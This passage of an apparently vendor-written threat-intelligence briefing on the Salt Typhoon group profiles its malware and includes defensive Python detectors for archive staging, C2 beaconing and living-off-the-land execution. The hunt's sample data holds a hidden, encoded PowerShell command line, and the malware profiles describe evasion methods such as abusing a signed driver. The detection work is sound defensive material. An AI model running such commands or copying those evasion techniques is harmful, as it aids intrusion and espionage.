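    {"path": "C:\\ProgramData\\Vendor\\update.cab", "size": 1 * MiB, "mtime": "2024-05-01T11:20:00"},
    # Outside the watched directories: ignored regardless of size.
    {"path": "C:\\Users\\jdoe\\Downloads\\report.zip", "size": 2 * MiB, "mtime": "2024-05-01T12:00:00"},
    {"path": "C:\\Backups\\site.rar", "size": 500 * MiB, "mtime": "2024-05-01T01:00:00"},
]


def is_candidate(rec):
    """Archive (by extension or multi-volume name) inside a watched directory."""
    p = PureWindowsPath(rec["path"])
    in_watched = any(rec["path"].lower().startswith(d.lower()) for d in WATCHED_DIRS)
    return in_watched and (p.suffix.lower() in ARCHIVE_EXT or bool(MULTI_VOLUME.search(p.name)))


def find_staging_clusters(records):
    """Group candidate archives per directory into time clusters and flag the big ones."""
    by_dir = defaultdict(list)
    for rec in records:
        if is_candidate(rec):
            by_dir[str(PureWindowsPath(rec["path"]).parent).lower()].append(rec)
    findings = []
    for directory, files in by_dir.items():
        files.sort(key=lambda r: datetime.fromisoformat(r["mtime"]))
        i = 0
        while i < len(files):
            start = datetime.fromisoformat(files[i]["mtime"])
            cluster = [f for f in files[i:]
                       if datetime.fromisoformat(f["mtime"]) - start <= CLUSTER_WINDOW]
            total = sum(f["size"] for f in cluster)
            if len(cluster) >= MIN_CLUSTER_FILES or total >= MIN_CLUSTER_BYTES:
                findings.append({
                    "directory": directory,
                    "files": [f["path"] for f in cluster],
                    "total_bytes": total,
                    "first_mtime": cluster[0]["mtime"],
                    "last_mtime": cluster[-1]["mtime"],
                    "multi_volume": any(MULTI_VOLUME.search(PureWindowsPath(f["path"]).name)
                                        for f in cluster),
                })
            i += len(cluster)
    return findings


if __name__ == "__main__":
    for f in find_staging_clusters(SAMPLE_FILES):
        print(f"{f['directory']}: {len(f['files'])} file(s), {f['total_bytes'] // MiB} MiB, "
              f"multi-volume={f['multi_volume']}")
```

A hit here pairs naturally with the process telemetry for the same host and time window (which tool wrote the archive, under which account) and with outbound traffic from that host shortly afterwards; the cluster's size and timestamps also give the investigator a first estimate of what and how much may have left the network.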
Section 5: The Salt Typhoon Arsenal: A Malware Deep Dive
While Salt Typhoon excels at “Living off the Land,” it also maintains a formidable arsenal of custom and shared malware. These tools are deployed strategically to achieve objectives that cannot be met with standard system utilities, particularly for establishing stealthy persistence, enabling remote control, and conducting specialized data collection.
Table 1: Salt Typhoon Malware & Toolset
Malware Name | Type | Primary Function | Operational Context & Key Features | Relevant Snippets
Demodex | Kernel-Mode Rootkit | Stealth & Persistence | Hides files, processes, registry keys, and network traffic from security tools. Abuses a legitimate, signed third-party driver (from Cheat Engine) to bypass Windows Driver Signature Enforcement, allowing it to load on modern, secure-boot-enabled systems. | 1
GhostSpider | Modular Backdoor | Espionage & C2 | Deployed via DLL hijacking and operates primarily in-memory to evade file-based detection. Its modular design allows for flexible deployment of capabilities. Communicates with its C2 server using encrypted commands hidden within HTTP headers or cookies. | 2
SparrowDoor | Backdoor & Loader | Persistence & Remote Access | Often deployed via web shells on compromised servers. Provides remote access for file operations, command execution, and opening a reverse shell. Communicates over encrypted HTTP. Newer variants feature improved architecture and can process commands in parallel. | 5
JumbledPath | Packet Sniffer | Network Data Collection | A specialized, Go-based utility designed to perform packet capture on compromised Cisco network devices. It uses a chain of jump hosts to route its traffic, obscuring the attacker’s true location and making the activity appear internal. | 4
SnappyBee | Data Exfiltration Malware | Espionage & Data Theft | A stealthy malware used for data theft, often spread via phishing or malicious downloads. It establishes persistence, injects into legitimate processes, monitors user activity, and exfiltrates credentials and sensitive documents. It is a tool shared among several Chinese APT groups. | 9
Masol RAT | Remote Access Trojan | Remote Control | A cross-platform Remote Access Trojan (RAT) that provides attackers with interactive control over a compromised machine. It has been observed targeting both Windows and Linux servers within victim networks. | 9
In-Depth Malware Analysis
Demodex: This Windows kernel-mode rootkit is arguably Salt Typhoon’s most sophisticated tool and is reserved for high-value targets where long-term, undetected persistence is paramount.19 Its most innovative feature is its loading mechanism. To bypass modern Windows security features like Driver Signature Enforcement (which prevents unsigned drivers from being loaded into the kernel), Demodex does not attempt to use a stolen code-signing certificate. Instead, it abuses a legitimate, digitally signed third-party driver belonging to the open-source tool “Cheat Engine”.14 The attackers first install this benign driver, then exploit its functionality to manipulate kernel memory and manually load the unsigned Demodex rootkit, effectively piggybacking on the legitimate driver’s signature. Once loaded, Demodex hooks deep into the operating system to hide the group’s other malware artifacts—files, processes, and network connections—from both security software and forensic investigators.19
GhostSpider: This is a modular, in-memory backdoor designed for espionage.13 It is typically loaded into a compromised process using DLL hijacking. By operating entirely in memory, it leaves a minimal footprint on the disk, making it difficult for file-based antivirus scanners to detect. Its modularity allows the attackers to deploy only the specific functions needed for a given target, reducing the risk of discovery.18 C2 communications are cleverly disguised, with commands and data hidden within standard HTTP traffic, often inside headers or cookies, to blend in with legitimate web browsing.13
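C2 traffic that hides commands in HTTP headers or cookies defeats content signatures, but two properties of such a channel are hard to disguise: the implant checks in on a schedule, and the fields carrying encrypted data look nothing like real session cookies. The Python script below is an added illustration for this briefing, not Mjolnir Security code or analysis of a real GhostSpider sample. Over constructed proxy-log records it groups requests by source and destination, measures how regular the intervals between them are, and scores the Shannon entropy of long cookie values, reporting flows that beacon at a near-constant cadence. The log format, host names, thresholds and the cookie strings are all invented for the example.

```python
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta

MIN_REQUESTS = 6                  # fewer requests give no meaningful cadence
MAX_INTERVAL_CV = 0.10            # coefficient of variation below this is "on a timer"
SUSPICIOUS_COOKIE_LENGTH = 48     # only long values are scored for entropy
SUSPICIOUS_COOKIE_ENTROPY = 4.5   # bits per character; random data is near 6 for base64


def _build_sample_log():
    """Constructed proxy log: one timer-driven flow, one human browsing session."""
    base = datetime(2024, 5, 1, 9, 0, 0)
    records = []
    # Beacon-like flow: about 60 s cadence with small jitter, one long opaque cookie.
    beacon_cookie = "sid=q8Zk2pL0vXa9TnRw4Ey7cHs1GbUmJd5oKfQ3iNzV6hBtA0lCyWxMgP2rSeDu8jF1"
    t = base
    for gap in (0, 60, 61, 59, 60, 62, 58, 60):
        t += timedelta(seconds=gap)
        records.append({"time": t.isoformat(), "src": "ws-042",
                        "dst": "static-cdn.example.net", "cookie": beacon_cookie})
    # Ordinary browsing: irregular timing, short readable session cookie.
    t = base
    for gap in (0, 15, 185, 60, 640, 5):
        t += timedelta(seconds=gap)
        records.append({"time": t.isoformat(), "src": "ws-017",
                        "dst": "www.example.org", "cookie": "session=abc123"})
    return records


SAMPLE_PROXY_LOG = _build_sample_log()


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def cookie_value_entropy(cookie_header):
    """Highest entropy among cookie values long enough to carry encrypted data."""
    best = 0.0
    for part in cookie_header.split(";"):
        _, _, value = part.strip().partition("=")
        if len(value) >= SUSPICIOUS_COOKIE_LENGTH:
            best = max(best, shannon_entropy(value))
    return best


def interval_regularity(times):
    """Mean gap in seconds and its coefficient of variation (pstdev / mean)."""
    ts = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
    return mean, cv


def detect_beacons(records):
    flows = defaultdict(list)
    for r in records:
        flows[(r["src"], r["dst"])].append(r)
    findings = []
    for (src, dst), reqs in flows.items():
        if len(reqs) < MIN_REQUESTS:
            continue
        mean, cv = interval_regularity([datetime.fromisoformat(r["time"]) for r in reqs])
        if cv > MAX_INTERVAL_CV:
            continue
        entropy = max(cookie_value_entropy(r["cookie"]) for r in reqs)
        findings.append({"src": src, "dst": dst, "requests": len(reqs),
                         "mean_interval_s": round(mean, 1), "interval_cv": round(cv, 3),
                         "cookie_entropy": round(entropy, 2),
                         "high_entropy_cookie": entropy >= SUSPICIOUS_COOKIE_ENTROPY})
    return findings


if __name__ == "__main__":
    for f in detect_beacons(SAMPLE_PROXY_LOG):
        print(f)
```

Neither signal is conclusive alone: software updaters also poll on timers, and some legitimate sites issue long opaque tokens. The combination, a fixed cadence plus high-entropy cookies to a destination the organisation has no business relationship with, is what a SOC analyst would escalate, and the same regularity test applies to any other transport the group proxies through a chain of jump hosts.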
JumbledPath: This tool showcases the group’s specific focus on telecommunications infrastructure. JumbledPath is a custom utility written in the Go programming language, designed for a single purpose: to capture network packets on compromised Cisco devices.8 Its use of jump hosts—intermediary compromised systems—to relay commands and exfiltrate data is a key feature that makes its traffic appear to originate from a trusted internal source, complicating network-based detection.24
Part III: Building Resilience – Countering Salt Typhoon with Mjolnir Security
Section 6: A Proactive Defense Posture for a Persistent Adversary
The tactics, techniques, and procedures employed by Salt Typhoon render traditional, reactive security models fundamentally inadequate. A defense strategy predicated on waiting for alerts from signature-based tools like antivirus or simple firewalls is destined to fail. The group’s heavy reliance on “Living off the Land” techniques, its use of encrypted and proxied command-and-control channels, and its deployment of advanced, in-memory malware and kernel-mode rootkits are all designed specifically to bypass these legacy defenses.5
Therefore, building resilience against a state-sponsored adversary like Salt Typhoon requires a paradigm shift in defensive philosophy. The foundational principle of this new posture must be the concept of “assume breach.” Organizations in critical sectors must operate under the assumption that a persistent and sophisticated actor is already present, or will inevitably gain access to, their networks. This mindset moves the focus from solely preventing intrusion to rapidly detecting, containing, and eradicating threats that are already inside.
This intelligence-led defense model is built on several key pillars:
Proactive Threat Hunting: Instead of passively waiting for alarms, security teams must actively hunt for the adversary. This involves hypothesis-driven searches for anomalous behaviors that align with known adversary TTPs, such as unusual PowerShell execution, suspicious WMI activity, or unexpected network connections from legitimate system processes.
Comprehensive Digital Forensics and Incident Response (DFIR): When a breach is suspected or confirmed, an organization must have the capability to conduct rapid and deep investigations to understand the full scope of the compromise, effectively eradicate the adversary’s presence (including hidden backdoors and rootkits), and restore systems securely.
Continuous Security Posture Management: Since Salt Typhoon overwhelmingly exploits basic failures in security hygiene, a resilient defense requires relentless attention to fundamentals. This includes aggressive patch management for all internet-facing systems, strict credential hygiene and access control, robust network segmentation to limit lateral movement, and the hardening of all network devices and servers.
Zero Trust Architecture: The principles of Zero Trust—never trust, always verify—are a direct counter to Salt Typhoon’s lateral movement techniques. By enforcing strict authentication for every user and device, implementing the principle of least privilege, and micro-segmenting the network, organizations can severely restrict an intruder’s ability to move from their initial point of compromise to high-value assets.
Mjolnir Security provides a suite of advanced, intelligence-driven services designed to empower organizations to adopt this proactive defense posture and effectively counter the specific threats posed by Salt Typhoon. Our capabilities are directly mapped to the adversary’s TTPs, providing a comprehensive and layered defense.
Tactic | ATT&CK Techniques | Mjolnir Security Service | How It Counters Salt Typhoon | Relevant Snippets
| | | Proactively identifies and validates the same unpatched vulnerabilities in systems like Cisco, Exchange, and Ivanti that Salt Typhoon exploits, allowing for remediation before they can be compromised. Our Red Team assessments simulate their attack paths. | 8
Execution & Lateral Movement | Command and Scripting Interpreter (T1059), WMI (T1047), Remote Services (T1021) | Threat Hunting as a Service (THaaS) | Our expert human hunters actively search for the anomalous use of legitimate tools (PowerShell, WMI, PsExec) that signature-based products miss. We hunt for the adversary’s behavior, not just their malware, detecting the stealthy LotL activity that is a hallmark of Salt Typhoon. | 4
Defense Evasion & Persistence | Rootkit (T1014), Masquerading (T1036), Indicator Removal on Host (T1070) | Digital Forensics & Incident Response (DFIR) | Our DFIR team possesses the deep technical expertise required to perform kernel-level memory forensics to uncover threats like the Demodex rootkit and reconstruct attacker activity even when logs have been cleared. We find what adversaries try to hide. | 1
Credential Access | OS Credential Dumping: LSASS Memory (T1003.001) | Incident Response (IR) & Compromise Assessment | In the event of a breach, our IR team rapidly contains the threat to prevent further credential theft. Proactively, our Compromise Assessment service hunts for evidence of past or ongoing intrusions, including signs of credential dumping and lateral movement. | 5
Command & Control | Encrypted Channel (T1573), Proxy (T1090) | SOCaaS with Advanced Threat Detection | Our 24/7 Security Operations Center as a Service (SOCaaS) leverages advanced tooling and expert analysis to monitor network traffic for sophisticated C2 patterns, including encrypted channels, beaconing to unusual domains, and the use of internal proxies, which are key TTPs for Salt Typhoon. |
| | Virtual CISO (vCISO) | Our vCISO service provides the strategic leadership to build a robust, long-term defense posture. We help implement Zero Trust principles, mature vulnerability management programs, and address the systemic weaknesses in process and policy that enable actors like Salt Typhoon to succeed. | 6
7.1 Threat Hunting as a Service (THaaS): Finding the Ghost in the Machine
Mjolnir Security’s Threat Hunting as a Service (THaaS) is a critical capability for detecting an adversary like Salt Typhoon.36 Recognizing that you are not fighting technology, but humans behind the technology, our service deploys expert human hunters who understand the adversary’s mindset and methodologies.42 Unlike automated tools that rely on known-bad signatures, our hunters proactively search for indicators of attack—the subtle patterns of malicious behavior masquerading as legitimate administrative activity.37 By developing hypotheses based on MITRE ATT&CK® and intelligence on Salt Typhoon’s specific TTPs, our hunters search endpoint, network, and log data for evidence of LotL techniques, anomalous credential usage, and stealthy persistence mechanisms that would otherwise go unnoticed.44
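The hypothesis-driven hunt described in the THaaS table row and in this section, shown as an added illustration that is not Mjolnir Security's tooling: it scores constructed process-creation events (shaped like Sysmon Event ID 1 or Windows 4688 fields) against parent/child pairings for T1021, T1047 and T1059, and decodes an encoded PowerShell argument for triage. The hosts, paths and command lines are constructed samples, and the `hunt` and `decode_encoded_powershell` names are this example's own.

```python
# Hypothesis-driven hunt for living-off-the-land execution (T1059, T1047, T1021).
# Added illustration, not Mjolnir Security's THaaS tooling; events are constructed.
import base64
import re
from collections import namedtuple

# Minimal process-creation record: host, parent image path, image path, command line.
ProcEvent = namedtuple("ProcEvent", "host parent image cmdline")


def _is(image: str, *names: str) -> bool:
    """Case-insensitive match on the image file name only."""
    return image.rsplit("\\", 1)[-1].lower() in names


def decode_encoded_powershell(cmdline: str) -> "str | None":
    """Decode a -enc/-EncodedCommand payload (base64 of UTF-16LE) for triage, else None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Parent/child pairing is the behavioural signal: every binary is legitimate, so
# signature matching has nothing to key on; the hypothesis names map to ATT&CK.
HYPOTHESES = [
    ("T1021.002 PsExec-style service started by the SCM",
     lambda e: _is(e.parent, "services.exe") and _is(e.image, "psexesvc.exe")),
    ("T1047 WMI provider host spawning a shell",
     lambda e: _is(e.parent, "wmiprvse.exe") and _is(e.image, "cmd.exe", "powershell.exe")),
    ("T1059.001 PowerShell launched with an encoded command",
     lambda e: _is(e.image, "powershell.exe") and decode_encoded_powershell(e.cmdline) is not None),
]


def hunt(events: list) -> list:
    """Return (host, hypothesis, detail) for each event matching a hypothesis."""
    hits = []
    for e in events:
        for name, pred in HYPOTHESES:
            if pred(e):
                hits.append((e.host, name, decode_encoded_powershell(e.cmdline) or e.cmdline))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [  # constructed telemetry, not incident data
    ProcEvent("FS01", r"C:\Windows\System32\services.exe", r"C:\Windows\PSEXESVC.exe", "PSEXESVC.exe"),
    ProcEvent("DC02", r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("WS17", r"C:\Windows\explorer.exe", PS, "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcEvent("WS17", r"C:\Windows\explorer.exe", PS, "powershell.exe Get-ChildItem"),  # routine admin use
    ProcEvent("DC02", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe", "wmiprvse.exe -Embedding"),
]
```

Running `hunt(SAMPLE)` yields three hits (the PsExec service, the WMI-spawned shell, and the encoded PowerShell decoded to `IEX`), while the routine PowerShell use and the normal WmiPrvSE start stay silent.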
7.2 Digital Forensics & Incident Response (DFIR): Uncovering and Eradicating the Threat
In the event of a breach by a sophisticated actor like Salt Typhoon, a swift and expert response is paramount to minimizing damage. Mjolnir Security’s DFIR services are designed to manage the full lifecycle of an incident, from containment to recovery.40 Our team of certified forensic professionals utilizes state-of-the-art tools and methodologies to conduct deep investigations, capable of uncovering kernel-level rootkits like Demodex and reconstructing attack timelines even in the face of anti-forensic techniques like log wiping.41 Our process ensures the complete eradication of the threat actor’s presence, including all backdoors and persistence mechanisms, followed by a strategic recovery phase to harden systems and prevent re-infection.39 Our 24/7 Incident Response hotline at +1 833 403 5875 ensures immediate access to our elite cyber SWAT unit in a crisis.39
7.3 Proactive Security Assessments & vCISO: Hardening the Gates
The most effective way to combat Salt Typhoon is to deny them their preferred entry vectors. Mjolnir Security’s portfolio of proactive services is designed to do precisely that. Our Vulnerability Assessments and Mjolnir Shield Penetration Testing services identify and validate the very security gaps in external-facing systems that Salt Typhoon exploits, providing actionable guidance for remediation before an attack occurs.36 Our Compromise Assessments proactively hunt for signs of an existing, undiscovered breach. For organizations needing strategic guidance, our Virtual CISO (vCISO) service provides the executive-level expertise to build and mature a comprehensive security program. Our vCISOs work with leadership to implement robust vulnerability management processes, drive the adoption of Zero Trust principles, and instill the organizational discipline required to build lasting resilience against persistent, state-sponsored threats.
Conclusion: The Enduring Threat and the Path to Strategic Resilience
Salt Typhoon is not a transient problem or a common cybercriminal group. It is the manifestation of a nation-state’s strategic will, executed by a professional, well-resourced, and highly disciplined organization. Their focus on long-term espionage, their patient and stealthy methodology, and their demonstrated ability to compromise the core infrastructure of a global superpower represent a persistent and escalating threat. They are a permanent feature of the modern cyber landscape.
Defending against such an adversary cannot be accomplished through technology alone. It requires a fundamental shift in mindset from a reactive posture of perimeter defense to a proactive, intelligence-driven strategy of resilience. It demands an understanding of the adversary’s “anthropology”—their culture, their motivations, and their operational doctrines—to anticipate their movements and counter their techniques. The path to resilience is built on the assumption of a compromised environment, the active hunting of threats within the wire, and an unwavering commitment to the fundamentals of security hygiene.
This is a battle of persistence, intelligence, and expertise. Mjolnir Security provides the critical combination of advanced technology, elite human talent, and strategic insight necessary to level the playing field. By partnering with Mjolnir, organizations can move beyond a state of constant reaction and begin to build a truly resilient security posture capable of withstanding the sustained pressure from one of the world’s most formidable cyber espionage actors.
Treasury Sanctions Company Associated with Salt Typhoon and Hacker Associated with Treasury Compromise | U.S. Department of the Treasury, accessed July 6, 2025, https://home.treasury.gov/news/press-releases/jy2792